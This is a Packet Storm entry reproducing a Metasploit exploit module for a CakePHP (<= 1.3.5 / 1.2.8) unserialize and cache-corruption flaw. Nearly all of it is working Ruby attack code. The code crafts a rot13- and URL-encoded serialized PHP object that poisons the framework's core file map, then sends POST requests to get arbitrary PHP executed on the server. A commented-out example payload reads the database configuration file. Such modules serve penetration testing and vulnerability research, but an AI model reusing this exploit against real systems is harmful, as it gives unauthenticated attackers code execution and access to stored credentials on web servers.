CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit

2010-11-20T00:00:00
ID PACKETSTORM:95998
Type packetstorm
Reporter Felix Wilhelm
Modified 2010-11-20T00:00:00

Description

                                        
                                            `##  
# $Id: cakephp_cache_corruption.rb 11074 2010-11-19 20:43:56Z swtornio $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit',  
'Description' => %q{  
  
CakePHP is a popular PHP framework for building web applications.  
The Security component of CakePHP is vulnerable to an unserialize attack which  
could be abused to allow unauthenticated attackers to execute arbitrary   
code with the permissions of the webserver.  
},  
'Author' => [  
'tdz',   
'Felix Wilhelm', # poc  
],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 11074 $',  
'References' =>  
[  
[ 'OSVDB', '69352'],  
[ 'BID', '44852' ],  
[ 'URL', 'http://packetstormsecurity.org/files/view/95847/burnedcake.py.txt' ]  
],  
'Privileged' => false,  
'Platform' => ['php'],  
'Arch' => ARCH_PHP,  
'Payload' =>  
{  
'Space' => 4000,  
# max url length for some old versions of apache according to  
# http://www.boutell.com/newfaq/misc/urllength.html  
'DisableNops' => true,  
#'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install  
'Compat' =>  
{  
'ConnectionType' => 'find',  
},  
'Keys' => ['php'],  
},  
'Targets' => [ ['Automatic', { }], ],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Nov 15 2010'  
))  
  
register_options(  
[  
OptString.new('URI', [ true, "CakePHP POST path", '/']),  
OptString.new('OptionalPostData', [ false, "Optional POST data", '']),  
], self.class)  
end  
  
  
def exploit  
#path = rand_text_alphanumeric(rand(5)+5)  
key = rand_text_alphanumeric(rand(5)+5)  
fields = rand_text_alphanumeric(rand(5)+5)  
  
#payload = "readfile('../config/database.php'); exit();"  
len=payload.encoded.length + 6  
  
p = ""  
p << ':O:3:"App":4:{s:7:"__cache";s:3:"bam";s:5:"__map";a:2:{s:4'  
p << ':"Core";a:1:{s:6:"Router";s:42:"../tmp/cache/persistent/cake_core_file_map";}'  
p << 's:3:"Foo";s:'  
p << len.to_s()  
p << ':"<? '  
p << payload.encoded   
p << ' ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}'  
  
#rot13 and urlencode  
p = p.tr("A-Ma-mN-Zn-z","N-Zn-zA-Ma-m")  
p = CGI.escape(p)  
  
data = "data%5b_Token%5d%5bkey%5d="  
data << key  
data << "&data%5b_Token%5d%5bfields%5d="  
data << fields  
data << p  
data << "&_method=POST"  
  
#some apps need the form post data  
if datastore['OptionalPostData']  
postdata = CGI.escape(datastore['OptionalPostData'])  
data << "&"  
data << postdata  
end  
  
print_status("Sending exploit request 1")  
res = send_request_cgi(  
{  
'uri' => datastore['URI'],  
'method' => "POST",  
'ctype' => 'application/x-www-form-urlencoded',   
'data' => data  
}, 5)  
  
print_status("Sending exploit request 2")  
res = send_request_cgi(  
{   
'uri' => datastore['URI'],  
'method' => "POST",  
'ctype' => 'application/x-www-form-urlencoded',  
'data' => data  
},5)  
  
print_status("Requesting our payload")  
response = send_request_raw({  
# Allow findsock payloads to work  
'global' => true,  
'uri' => datastore['URI']  
}, 5)  
  
handler  
end  
end  
`